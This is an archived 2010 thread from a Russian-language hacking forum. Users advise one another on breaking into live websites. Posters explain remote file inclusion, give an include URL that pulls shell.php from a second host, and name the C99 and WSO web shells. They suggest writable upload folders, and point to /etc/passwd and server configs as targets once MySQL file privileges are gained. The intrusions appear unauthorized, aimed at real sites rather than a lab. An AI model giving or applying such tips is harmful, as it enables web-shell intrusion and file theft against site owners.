ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
22.08.2010, 18:40
|
|
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
Провел на форуме:
344917
Репутация:
17
|
|
kamaz, Если не ошибаюсь narod.ru не поддерживает язык php.
|
|
|
22.08.2010, 18:44
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013
Репутация:
453
|
|
Сообщение от -PRIVAT-
-PRIVAT- said:
kamaz
, Если не ошибаюсь narod.ru не поддерживает язык php.
На народе ничего не будет выполняться.
RFI заключается в том, что удаленный скрипт выполняется на сервере.
Следовательно сервер, на котором находится сайт site.ru считает с народа файл 123.php и выполнит его, скопировав файл shell.php в папку, доступную для записи.
|
|
|
|
22.08.2010, 18:48
|
|
Новичок
Регистрация: 03.06.2010
Сообщений: 0
Провел на форуме:
648
Репутация:
0
|
|
Вы не могли бы, пожалуйста, подсказать скрипт какой-нибудь на поиск директории без зепрета на запись на пхп.
|
|
|
|
22.08.2010, 18:50
|
|
Новичок
Регистрация: 03.06.2010
Сообщений: 0
Провел на форуме:
648
Репутация:
0
|
|
я пробовал заходить через браузер папки, везде естественно -пермишн денайд!((
|
|
|
|
23.08.2010, 00:44
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от against
against said:
Вы не могли бы, пожалуйста, подсказать скрипт какой-нибудь на поиск директории без зепрета на запись на пхп.
так через шелл заинклюженный посмотри. Или мозгами пораскинь, где могут быть папки, доступные для записи: в /images/, /uploads/, /files/ и т.п. Если сайт с возможностью публикации контента, файлов и картинок, то пути в html-коде сайта глянуть можно. А почему у тебя не работает шелл приинклюденный (site.com/script.php?page=http://site2/shell.php). С99, да и wso нормально в таком режиме работают.
|
|
|
|
23.08.2010, 01:28
|
|
Новичок
Регистрация: 03.06.2010
Сообщений: 0
Провел на форуме:
648
Репутация:
0
|
|
Попугай, затруднение в том, что сайт совсем статичный, в шелле не показывает не одной папки доступной на запись, все инклуды извне не получаются, как и скачивание, вероятно как-то режутся фаером. По-ходу на этом сайте ниче путного не прокатит, только если MySQL ковырять((((((
Всем большое спасибо за помощь, и советы)))
|
|
|
|
23.08.2010, 17:32
|
|
Познающий
Регистрация: 14.01.2009
Сообщений: 93
Провел на форуме:
244235
Репутация:
39
|
|
Привет. Есть серв на win64, mysql5 и iis 7. File_priv есть, прочел odbc.ini. Где находятся конфиги виртуальных хостов в иисе? Можно ли как-то узнать full path к сайту через конфиги? Спасибо
|
|
|
|
23.08.2010, 18:07
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от roddik
roddik said:
Привет. Есть серв на win64, mysql5 и iis 7. File_priv есть, прочел odbc.ini. Где находятся конфиги виртуальных хостов в иисе? Можно ли как-то узнать full path к сайту через конфиги? Спасибо
/etc/httpd/conf/httpd.conf
|
|
|
|
23.08.2010, 18:22
|
|
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
Провел на форуме:
344917
Репутация:
17
|
|
Посмотри так же тут: etc/passwd мб найдёшь что-нибудь...
|
|
|
|
23.08.2010, 18:33
|
|
Новичок
Регистрация: 17.06.2010
Сообщений: 0
Провел на форуме:
5094
Репутация:
0
|
|
Сообщение от roddik
roddik said:
Привет. Есть серв на win64, mysql5 и iis 7. File_priv есть, прочел odbc.ini. Где находятся конфиги виртуальных хостов в иисе? Можно ли как-то узнать full path к сайту через конфиги? Спасибо
odbc.ini ? mssql ?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
